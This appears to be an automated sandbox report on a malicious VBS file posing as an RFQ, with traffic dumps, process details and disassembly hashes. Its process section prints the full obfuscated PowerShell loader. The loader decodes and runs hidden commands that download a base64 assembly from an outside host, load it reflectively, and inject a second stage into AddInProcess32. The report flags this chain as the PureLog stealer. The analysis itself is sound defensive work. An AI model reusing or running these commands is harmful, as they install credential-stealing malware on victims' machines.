                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                                  Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                                  Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                                  Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                                  2024-09-27 08:43:55 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                                  Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.749700172.66.0.2354435220C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-09-27 08:44:00 UTC101OUTGET /bsnk.txt HTTP/1.1
                                                                  Host: pub-6346c84860d5480393a1799fb277dfdc.r2.dev
                                                                  Connection: Keep-Alive
                                                                  2024-09-27 08:44:00 UTC222INHTTP/1.1 200 OK
                                                                  Date: Fri, 27 Sep 2024 08:44:00 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Server: cloudflare
                                                                  CF-RAY: 8c9a3596780e43b0-EWR
                                                                  2024-09-27 08:44:00 UTC1147INData Raw: 31 31 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                  Data Ascii: 1132<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                  2024-09-27 08:44:00 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                                  Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                                  2024-09-27 08:44:00 UTC1369INData Raw: 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
                                                                  Data Ascii: a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div>
                                                                  2024-09-27 08:44:00 UTC525INData Raw: 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 61 72 20 61
                                                                  Data Ascii: ementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a
                                                                  2024-09-27 08:44:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:04:43:49
                                                                  Start date:27/09/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ 2024.09.26-89 vivecta.vbs"
                                                                  Imagebase:0x7ff6d59a0000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:04:43:49
                                                                  Start date:27/09/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzEnKyd9dXInKydsICcrJz0gezB9aHR0cHM6LycrJy9pYTYwMDEwMCcrJy51cycrJy5hcmNoJysnaXYnKydlLm9yZycrJy8yNCcrJy9pdGUnKydtcy8nKydkJysnZXRhJysnaC0nKydubycrJ3QnKydlLXYvRGUnKyd0YWgnKydOb3RlVi50eCcrJ3QnKyd7MCcrJ30nKyc7ezF9YmFzZTYnKyc0Q29udGVudCA9IChOJysnZXcnKyctTycrJ2InKydqZScrJ2N0IFN5c3RlbS5OZXQuJysnV2ViQ2xpZScrJ250KS4nKydEb3dubG8nKydhJysnZFN0cmluJysnZyh7JysnMX11cmwpOycrJ3sxfWJpJysnbicrJ2FyeUNvbicrJ3RlbnQgPSBbU3knKydzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tJysnQmFzJysnZScrJzY0JysnU3RyaW5nJysnKHsnKycxfWJhc2U2NENvbnQnKydlbnQpJysnO3sxfScrJ2Fzc2VtYmx5ID0gJysnWycrJ1JlZmwnKydlJysnY3Rpb24uQXNzJysnZW1ibHldOicrJzpMb2FkKHsnKycxfWJpbicrJ2FyeUNvbnQnKydlbicrJ3QnKycpO3sxfXR5cCcrJ2UgPScrJyAnKyd7MX1hJysncycrJ3MnKydlbScrJ2JsJysneS4nKydHZXRUJysneXAnKydlKCcrJ3swJysnfScrJ1J1blBFLkhvbWUnKyd7MCcrJ30pJysnO3snKycxJysnfW1ldGgnKydvZCA9ICcrJ3snKycxfScrJ3R5cGUuRycrJ2V0TScrJ2V0aCcrJ28nKydkKHswfVYnKydBSXswfSknKyc7eycrJzF9bWUnKyd0JysnaCcrJ29kLkludm9rZSh7JysnMX1udWxsLCBbb2JqZWN0WycrJ11dQCcrJyh7MH0nKyd0eHQuaycrJ25zJysnYi92ZScrJ2QuMnIuY2RmZDc3JysnMmJmOTk3MScrJ2EzOScrJzMwODQnKyc1ZDAnKyc2JysnODQnKyc4YzY0MzYnKyctYicrJ3VwLy86c3B0JysndGh7MH0gLCAnKyd7MH1kZXNhdGknKyd2YWRvezB9ICwgJysnezB9ZGVzJysnYXRpdmFkb3swfSAsIHswJysnfWRlc2EnKyd0aXZhZCcrJ297MH0sezB9QWRkSW5Qcm9jZXNzJysnMycrJzInKyd7MCcrJ30sezB9ezB9KSknKSAgLWYgIFtjSGFyXTM5LFtjSGFyXTM2KSB8IGlOVk9LZS1lWHBSRVNTSW9O';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                  Imagebase:0x7ff741d30000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:04:43:49
                                                                  Start date:27/09/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff75da10000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:04:43:51
                                                                  Start date:27/09/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1'+'}ur'+'l '+'= {0}https:/'+'/ia600100'+'.us'+'.arch'+'iv'+'e.org'+'/24'+'/ite'+'ms/'+'d'+'eta'+'h-'+'no'+'t'+'e-v/De'+'tah'+'NoteV.tx'+'t'+'{0'+'}'+';{1}base6'+'4Content = (N'+'ew'+'-O'+'b'+'je'+'ct System.Net.'+'WebClie'+'nt).'+'Downlo'+'a'+'dStrin'+'g({'+'1}url);'+'{1}bi'+'n'+'aryCon'+'tent = [Sy'+'stem'+'.'+'Convert]::From'+'Bas'+'e'+'64'+'String'+'({'+'1}base64Cont'+'ent)'+';{1}'+'assembly = '+'['+'Refl'+'e'+'ction.Ass'+'embly]:'+':Load({'+'1}bin'+'aryCont'+'en'+'t'+');{1}typ'+'e ='+' '+'{1}a'+'s'+'s'+'em'+'bl'+'y.'+'GetT'+'yp'+'e('+'{0'+'}'+'RunPE.Home'+'{0'+'})'+';{'+'1'+'}meth'+'od = '+'{'+'1}'+'type.G'+'etM'+'eth'+'o'+'d({0}V'+'AI{0})'+';{'+'1}me'+'t'+'h'+'od.Invoke({'+'1}null, [object['+']]@'+'({0}'+'txt.k'+'ns'+'b/ve'+'d.2r.cdfd77'+'2bf9971'+'a39'+'3084'+'5d0'+'6'+'84'+'8c6436'+'-b'+'up//:spt'+'th{0} , '+'{0}desati'+'vado{0} , '+'{0}des'+'ativado{0} , {0'+'}desa'+'tivad'+'o{0},{0}AddInProcess'+'3'+'2'+'{0'+'},{0}{0}))') -f [cHar]39,[cHar]36) | iNVOKe-eXpRESSIoN"
                                                                  Imagebase:0x7ff741d30000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1423540417.00000217ABD20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.1400827922.00000217A3CCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FFAACC337B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1455107581.00007FFAACC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC30000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffaacc30000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction ID: f1f52c57f4c42814a085b47d6a9e3fff677add2a5a999d9e82820c5ad6703eb0
                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction Fuzzy Hash: 4C01677111CB0D8FD748EF0CE455AA6B7E0FB95364F10056DE58AC3651D736E882CB45

                                                                    Executed Functions

                                                                    Function 00007FFAACD00644 Relevance: 1.1, Instructions: 1079COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427544769.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacd00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b55d3dd630d9751fc42026e6fa953d2a22ab3b8d2cce7adfe9e7a842d90efb0b
                                                                    • Instruction ID: ba019cb3d913f23611179c96e926b3f42aebb0216e4d304adae64b7e967cbac4
                                                                    • Opcode Fuzzy Hash: b55d3dd630d9751fc42026e6fa953d2a22ab3b8d2cce7adfe9e7a842d90efb0b
                                                                    • Instruction Fuzzy Hash: F6623562A0EB89AFE796972C58555B57FE1EF87210B0841FBD05EC7193DE18E80AC381
                                                                    Function 00007FFAACD00013 Relevance: .7, Instructions: 739COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427544769.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacd00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad87fe78c8232559b24d7c9b3d4cb02edfeb8d5c7ccb94ac0c4563567e89fa74
                                                                    • Instruction ID: 6f981af4fd99a7dfb03663c16e68c4d161438c604e4016f94c675635e4485842
                                                                    • Opcode Fuzzy Hash: ad87fe78c8232559b24d7c9b3d4cb02edfeb8d5c7ccb94ac0c4563567e89fa74
                                                                    • Instruction Fuzzy Hash: B2221462A0EBC9AFF796976C48695B57FE0EF57210B0841FBD05EC7093DA18E809C381
                                                                    Function 00007FFAACD036EA Relevance: .5, Instructions: 472COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427544769.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacd00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d4f62599327fd62909c021e33fb04a3389ce2bdfade1db06b7dd6f6540a9be22
                                                                    • Instruction ID: c700e65601cb9deb85f430489a397fbdb2fc288faf522acae07f24233fc5e649
                                                                    • Opcode Fuzzy Hash: d4f62599327fd62909c021e33fb04a3389ce2bdfade1db06b7dd6f6540a9be22
                                                                    • Instruction Fuzzy Hash: CCE16762A0EB8A9FF796E72C98555B5BBE0EF46210B0801FED05EC71D3DA18D909C3D1
                                                                    Function 00007FFAACD07BCE Relevance: .2, Instructions: 226COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427544769.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacd00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 37bbd3098d4a27ab2fd1bf37e50f074026353f90496309e6e366a71d97173610
                                                                    • Instruction ID: 7d1c558e9568a29885f4c42388c00cbabd385b7ffd28cbeca3e11ecd7ca11cab
                                                                    • Opcode Fuzzy Hash: 37bbd3098d4a27ab2fd1bf37e50f074026353f90496309e6e366a71d97173610
                                                                    • Instruction Fuzzy Hash: 09613762B0EB86DFF7E5972C58215B967C1EF86212B1A40BED05FCB1D3ED08D80982D5
                                                                    Function 00007FFAACD0038E Relevance: .2, Instructions: 179COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427544769.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacd00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1cb5821f2c7eba59f8c57fdb81aeb77a0cb734419088bab99090ee7d7b0979c8
                                                                    • Instruction ID: ba6e4e704c606593971255a5199a3e329c3677b88f0cbcfe27185442be329f88
                                                                    • Opcode Fuzzy Hash: 1cb5821f2c7eba59f8c57fdb81aeb77a0cb734419088bab99090ee7d7b0979c8
                                                                    • Instruction Fuzzy Hash: 41511A22B0D689AFF7D5876C54695B57BE0EF56210B4881FAD04FC7193ED58EC09C380
                                                                    Function 00007FFAACD07C1A Relevance: .1, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427544769.00007FFAACD00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD00000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacd00000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67d3e906831248d3e2f5e0fc74d353514163124b2ff3aa5a23a29f6365bc476d
                                                                    • Instruction ID: 94c26fe3dff00b28711e379c603859a009b783f7012935c9b68be4351cc50517
                                                                    • Opcode Fuzzy Hash: 67d3e906831248d3e2f5e0fc74d353514163124b2ff3aa5a23a29f6365bc476d
                                                                    • Instruction Fuzzy Hash: 33412392F0FA87DBF7E6972C08651B866C1EF92252B5A40BDD41FCB1D3ED08D80982C5
                                                                    Function 00007FFAACC33F35 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427103780.00007FFAACC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC30000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacc30000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 54c2843a19106934bff848ec9ce532016a0b68c9bde24b701e6902d4ff0829bf
                                                                    • Instruction ID: 1673dc3d49c3f98cff329b65c4b4925baa94b5c793f39bc500a0485ee63d4fb7
                                                                    • Opcode Fuzzy Hash: 54c2843a19106934bff848ec9ce532016a0b68c9bde24b701e6902d4ff0829bf
                                                                    • Instruction Fuzzy Hash: 7E01677111CB0C8FD748EF0CE451AA6B7E0FB99364F50056DE58AC3651DB36E882CB45

                                                                    Non-executed Functions

                                                                    Function 00007FFAACC386A9 Relevance: .1, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1427103780.00007FFAACC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC30000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffaacc30000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3858b293dabbb2d8279c461705cae82b9730c39d5ccf31dfc1ce147ba5893716
                                                                    • Instruction ID: 12cf41e37471a38621b2deb1db4a060ac1ed14b56b128b771cfd8cb733fb5fdc
                                                                    • Opcode Fuzzy Hash: 3858b293dabbb2d8279c461705cae82b9730c39d5ccf31dfc1ce147ba5893716
                                                                    • Instruction Fuzzy Hash: B65132A684E7C14FE7038B709C665917FB0AF03224B0E45EBD4D4CF0E3E6589A5AC362